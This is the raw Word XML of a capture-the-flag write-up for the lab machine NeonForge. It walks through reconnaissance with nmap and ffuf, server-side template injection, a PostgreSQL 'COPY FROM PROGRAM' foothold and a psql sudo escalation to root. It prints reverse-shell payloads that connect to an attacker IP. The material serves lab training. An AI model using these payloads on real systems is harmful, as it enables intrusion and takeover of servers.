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360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5b5c155yk6j5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82imuf1qm0jp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7">
      <w:pPr>
        <w:jc w:val="center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NeonForge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machine. If support is required, please open a ticket in the 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 support channel on the Discord server.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fzqhgvej5d0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80" w:lineRule="auto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2zcafws864lu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We started the reconnaissance phase of the machine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nmap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to verify which ports were open.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"nmap –p- --open –min-rate 1200 &lt;machine-ip&gt; –sVC –oN nmap"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114300" distR="114300">
            <wp:extent cx="5495544" cy="2879876"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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87987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Based on the scan results, it was identified that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port 80/TCP (HTTP)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open and accessible on the target host.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3600" cy="2918063"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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80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Directory and file enumeration was performed on the web application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techniques in order to identify hidden resources and pages not directly exposed through the web interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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"ffuf –u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0000ff"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://ip/FUZZ</w:t>
        </w:r>
      </w:hyperlink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-w big.txt -c –t 100 –fl 8"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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925" cy="2970450"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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773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2970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Through manual navigation of the web application and analysis of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fuzzing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results, two main routes were identified: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/register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Style w:val="Heading3"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.g2k07r84zu2b" w:id="4"/>
      <w:bookmarkEnd w:id="4"/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It was possible to register a user account through the functionality available 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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/register</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> route, obtaining authenticated access to the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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495544" cy="3857449"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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385744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previously created credentials,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login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performed via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/login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route, establishing an authenticated session.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analysis of the application flow, an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input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field was identified that renders user-supplied content directly on the web interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:spacing w:after="281" w:before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114300" distR="114300">
            <wp:extent cx="5495544" cy="2474756"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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5544" cy="247475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confirming that this input rendered all submitted content directly on the web page, the presence of vulnerabilities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Cross-Site Scripting (XSS)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evaluated. The initial focus was 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To validate this, a simple mathematical expression was tested. By submitting a basic multiplication (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7 × 7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) and observing that the result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displayed, it was possible to infer that the input was being interpreted and executed by the application’s template engine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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601203"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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120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result returned by the application was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49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confirming that the mathematical operation was processed by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template engine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This behavior confirms the presence of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2C">
      <w:pPr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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5577840" cy="2592266"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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92266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SSTI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vulnerability confirmed, it became possible to execute operating system commands through native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PHP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functions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system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popen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passthru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exec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From this point forward, it was possible to obtain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by exploiting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Server-Side Template Injection (SSTI)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vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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{{['/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;vpn-ip&gt;/443 0&gt;&amp;1"']|map('passthru')}}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5943600" cy="3070463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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46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connection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successfully established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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51000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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25k9e9rzy9no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gzb5rrotxqni" w:id="6"/>
      <w:bookmarkEnd w:id="6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During analysis of the web application files,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Database.php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identified, which is responsible for database connection and interaction logic.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270000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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Within this file, it was possible to identify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database access password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064000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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connection to the database was established using the credentials obtained earlier.</w:t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901700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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If the database user has elevated privileges and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is enabled, it becomes possible to exploit this functionality to execute operating system commands through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Initially, a table was created in the database, and then command execution was tested through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functionality. For validation, a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 was used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C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CREATE TABLE a(output text);</w:t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COPY a from PROGRAM '/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;your-ip&gt;/443 0&gt;&amp;1"';</w:t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09600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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In this way,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reverse shell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obtained as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user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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612900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033806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/var/lib/postgresql.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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660400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033807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sudo -l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command, it was possible to identify which commands could be executed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without requiring a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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54100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1520338072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It was observed that the user has permission to execute the command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/usr/bin/psql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without requiring a password.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Before executing commands with elevated privileges, it was necessary to configure the database. To do so,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role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was defined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PostgreSQL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a database owned by this role was created, allowing authentication and database connection with administrative privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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CREATE ROLE root WITH LOGIN SUPERUSER;</w:t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CREATE DATABASE root OWNER root;</w:t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152033807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these configurations, it was possible to connect to the database as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62100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033807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Since commands were executed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privileges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it was possible to invoke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bash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within this context, resulting in full administrative privileges on the system. Reference </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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https://gtfobins.github.io/gtfobins/psql/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66800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033807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root flag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located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/root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directory.</w:t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514975" cy="552450"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033807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55245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31" w:type="default"/>
      <w:headerReference r:id="rId32" w:type="first"/>
      <w:headerReference r:id="rId33" w:type="even"/>
      <w:footerReference r:id="rId34" w:type="default"/>
      <w:footerReference r:id="rId35" w:type="first"/>
      <w:footerReference r:id="rId36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  <w:shd w:fill="9a309b" w:val="clear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 All rights reserved</w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">  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3">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6036q26k2cpk" w:id="7"/>
    <w:bookmarkEnd w:id="7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-866771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1520338063" name="image6.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image6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4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/>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.75pt;height:793.5pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-74.0pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.25pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image17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-942971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1520338070" name="image15.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image15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520338054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NeonForge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-339720</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5776596</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3006154"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="152033805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7025" cy="300615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5pt;height:793.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7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yperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="705BA671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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/psql/" TargetMode="External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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/299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header" Target="header1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip/FUZZ" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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17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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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buOOn5JFq3IagBnEz/zjMXKA5g==">CgMxLjAyDmguNWI1YzE1NXlrNmo1Mg5oLjgyaW11ZjFxbTBqcDINaC5menFoZ3ZlajVkMDIOaC4yemNhZndzODY0bHUyDmguZzJrMDdyODR6dTJiMg5oLjI1azllOXJ6eTlubzIOaC5nemI1cnJvdHhxbmkyDmguNjAzNnEyNmsyY3BrOAByITFmSDkxVmJDODBoczhYb2hyNm9OT0dkTTJkM2RHeFFsbQ==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2025-10-31T11:54:00.0000000Z</dcterms:created>
</cp:coreProperties>
</file>